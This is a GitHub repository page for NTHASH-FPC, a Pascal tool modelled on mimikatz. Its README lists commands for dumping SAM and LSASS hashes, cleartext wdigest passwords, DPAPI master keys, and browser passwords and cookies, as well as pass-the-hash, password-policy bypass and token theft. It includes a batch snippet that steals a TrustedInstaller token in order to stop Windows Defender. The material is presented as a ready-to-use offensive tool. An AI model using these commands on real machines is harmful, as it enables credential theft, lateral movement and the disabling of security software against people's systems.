Skip to content
No description, website, or topics provided.
Pascal Batchfile
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitattributes
.gitignore
NC.zip
NTHASH.lpi
NTHASH.lpr
NTHASH.lps
NTHASH.res
NTHASH.zip
README.md
hash.cmd
lsaapi.pas
nc_clt.bat
nc_srv.bat
offreg.dll
offreg64.dll
sqlite3-64.dll
sqlite3.dll
trusted.cmd
uac.RES
uac.manifest
uac.rc
uadvapi32.pas
uchrome.pas
ucryptoapi.pas
ufirefox.pas
uimagehlp.pas
ulsa.pas
umemory.pas
untdll.pas
uofflinereg.pas
upsapi.pas
urunelevatedsupport.pas
usamlib.pas
usamutils.pas
usid.pas
utils.pas
uvaults.pas
uwmi.pas
winsta.pas
wmic
wtsapi32.pas

README.md

NTHASH-FPC

A tribute to https://github.com/gentilkiwi/mimikatz...
And generally speaking a tool to handle windows passwords and perform lateral movement.
https://attack.mitre.org/matrices/enterprise/windows/ is definitely worth reading as well.


Command line as below:
NTHASH /setntlm [/server:hostname] /user:username /newhash:xxx
NTHASH /setntlm [/server:hostname] /user:username /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newhash:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newhash:xxx
NTHASH /getntlmhash /password:password
NTHASH /getsid /user:username [/server:hostname]
NTHASH /getusers [/server:hostname]
NTHASH /getdomains [/server:hostname
NTHASH /dumpsam
NTHASH /dumphashes [/offline]
NTHASH /getsamkey [/offline]
NTHASH /getsyskey [/offline]
NTHASH /getlsakeys
NTHASH /wdigest
NTHASH /logonpasswords
NTHASH /pth /user:username /password:myhash /domain:mydomain
NTHASH /enumcred
NTHASH /enumcred2
NTHASH /enumvault
NTHASH /chrome [/binary:path_to_database]
NTHASH /ccookies [/binary:path_to_database]
NTHASH /firefox [/binary:path_to_database]
NTHASH /fcookies [/binary:path_to_database]
NTHASH /bytetostring /input:hexabytes
NTHASH /stringtobyte /input:string
NTHASH /widestringtobyte /input:string
NTHASH /base64encodew /input:string
NTHASH /base64encode /input:string
NTHASH /base64decode /input:base64string
NTHASH /cryptunprotectdata /binary:filename
NTHASH /cryptunprotectdata /input:string
NTHASH /cryptprotectdata /input:string
NTHASH /getlsasecret /input:secret
NTHASH /dpapimk
NTHASH /dpapi_system
NTHASH /runasuser /user:username /password:password [/binary: x:\folder\bin.exe]
NTHASH /runastoken /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runaschild /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runas [/binary: x:\folder\bin.exe]
NTHASH /runts /user:session_id [/binary: x:\folder\bin.exe]
NTHASH /enumpriv
NTHASH /enumproc
NTHASH /dumpproc /pid:12345
NTHASH /runwmi /binary\folder\bin.exe [/server:hostname]
NTHASH /context
NTHASH /a_command /verbose
NTHASH /a_command /system

changentlm, using a legacy api, may not work if your ntlm hashes are encrypted with AES (i.e starting with win10 1607.
Credits goes to https://github.com/vletoux/NTLMInjector

setntlm on the other hand should always work and allow one to bypass password policy.
Credits goes to https://github.com/vletoux/NTLMInjector

dumpsam will temporarily patch a module in lsass to be able to dump your SAM ntlm hashes from the lsass memory (need to cover/test as many windows version as possible).

dumphash and dumphashes will read the registry - you need to run as system to perform this action
. Or you can use the /system switch
. You can also perform this offline (and then no longer require to run as system).
You can use reg save hklm\sam sam.sav and reg save hklm\system system.sav to generate offline hives.
Both the RC4 and AES cipher are supported.
https://www.insecurity.be/blog/2018/01/21/retrieving-ntlm-hashes-and-what-changed-technical-writeup/ is a must read to understand RC4 vs AES.

cryptunprotectdata and cryptprotectdata will decrypt datas using dpapi under the runnin user context.
You can for example decrypt the wireless stored password in C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{INTERFACE UUID} .
Retrieve the xml keyMaterial value and run nthash /cryptunprotectdata /input:keymateriel /system .
Note that this data is encrypted/decrypted under the system account.

enumcred will use CredEnumerate windows API to enumerate the logged on user credentials.
enumcred2 will use CredEnumerate windows API to enumerate the logged on user credentials while also patching lsass to dump all credentials

enumvault will use vaultcli.dll windows API to enumerate the logged on user vault credentials.

logonpasswords will dump lsasrv logon sessions primary credentials (hashes) and credential managers (clear text)

wdigest will dump wdigest sessions credentials (clear text)

runastoken can be used to run a process under a system account.
Once under a system account, you can also "steal" a token from trustedinstaller (net start trustedinstaller before hand.
Note that you can steal a trustedinstaller token directly by using the /system switch.
With a trustedinstaller token, you can perform actions like stop windefend (or kill the process, or modify the AV settings, etc).
See example below where you would start the trustedinstaller service, retrieve its pid and run a process as the account.
@echo off
net start trustedinstaller
for /F "tokens=1" %%K in (' nthash-win64 /enumproc ^| findstr /i "trustedinstaller" ') do ( nthash-win64 /runastoken /pid:%%K /system )

runaschild can be used to run a process as a child of another existing/parent process.
Note that some apps (like cmd.exe) will crash right after initialization with a c0000142.
Wierdly enough, loading notepad.exe with this method and then launching cmd.exe from there works...

runas will launch a process in elevated mode.

runts will launch a process in the context of another TS session.
Note that this one needs the setcbprivilege so you will have to find a token with such privilege first (like winlogon.exe).

todo/news:
-decrypt sam hashes online (rather than patching lsass) and offline : done in v1.1
-deal with new AES cipher used in latest win10 1607 : done in 1.2
-enum Lsasrv.dll!LogonSessionList: done in 1.3
-enum Wdigest.dll!l_LogSessList: done in 1.3
-decrypt dpapi encrypted vault and/or credentials : done in 1.4
-patch LogonSessionList and perform pth: done in 1.4
-decrypt chrome and firefox passwords: done in 1.4
-decrypt firefox and chrome passwords/cookies : done in 1.5
-dpapimk command to dump all masterkeys : done in 1.6
-getlsassecret using LsaRetrievePrivateData: done in 1.6
-todo : work out offline decryption of lsasecrets as well as currval and oldval
-todo : work out LsaICryptUnprotectData thru dll injection
-todo : work out masterkey decryption based on sha1 user password
-todo : work out credential blob decryption based on decrypted masterkey

You can’t perform that action at this time.